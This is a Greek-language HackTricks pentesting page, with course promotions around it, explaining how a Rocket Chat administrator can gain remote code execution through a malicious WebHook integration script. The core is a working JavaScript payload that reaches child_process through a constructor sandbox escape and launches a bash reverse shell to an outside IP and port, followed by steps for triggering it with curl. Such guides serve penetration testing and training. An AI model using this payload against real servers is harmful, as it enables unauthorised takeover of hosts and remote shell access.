Greek - Ht
HackTricks Training Twitter Linkedin Sponsor

Rocket Chat

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι υποστήριξης του HackTricks:

RCE

Αν είστε διαχειριστής μέσα στο Rocket Chat μπορείτε να αποκτήσετε RCE.

  • Πηγαίνετε στο Ενσωματώσεις και επιλέξτε Νέα Ενσωμάτωση και επιλέξτε οποιαδήποτε: Εισερχόμενο WebHook ή Εξερχόμενο WebHook.

  • /admin/integrations/incoming

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

  • Ρύθμιση του WebHook (το κανάλι και η ανάρτηση ως όνομα χρήστη πρέπει να υπάρχουν):

  • Ρύθμιση του σεναρίου WebHook:

  • Αποθήκευση αλλαγών

  • Λήψη του δημιουργημένου URL του WebHook:

  • Καλέστε το με το curl και θα πρέπει να λάβετε το αντίστροφο κέλυφος

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι υποστήριξης του HackTricks:

PreviousPythonNextSpecial HTTP headers

Last updated